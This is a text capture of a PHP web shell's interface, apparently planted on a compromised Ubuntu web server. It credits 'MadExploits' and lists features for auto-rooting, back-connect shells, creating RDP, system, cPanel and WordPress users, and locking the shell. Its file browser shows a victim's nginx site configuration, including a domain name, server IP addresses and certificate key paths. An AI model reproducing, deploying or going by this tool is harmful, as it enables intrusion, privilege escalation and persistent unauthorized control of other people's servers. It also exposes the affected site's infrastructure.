Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.190.104
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
nginx /
sites-enabled /
[ HOME SHELL ]
Name
Size
Permission
Action
arcus
929
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : arcus
server { listen [::]:8443 ssl; listen 8443 ssl; root /var/www/html/arcus/; # Set the root directory for the entire server block index index.php index.html index.htm index.nginx-debian.html; server_name arcusdesignz.com; proxy_read_timeout 720s; proxy_connect_timeout 720s; proxy_send_timeout 720s; location / { proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_pass http://localhost:8080; # Assuming your backend server is running on port 8080 try_files $uri $uri/ /index.html; } ssl_certificate /etc/letsencrypt/live/arcusdesignz.com/fullchain.pem; # managed by Certbot ssl_certificate_key /etc/letsencrypt/live/arcusdesignz.com/privkey.pem; # managed by Certbot include /etc/letsencrypt/options-ssl-nginx.conf; ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem; error_log /var/log/nginx/error.log error; }
Close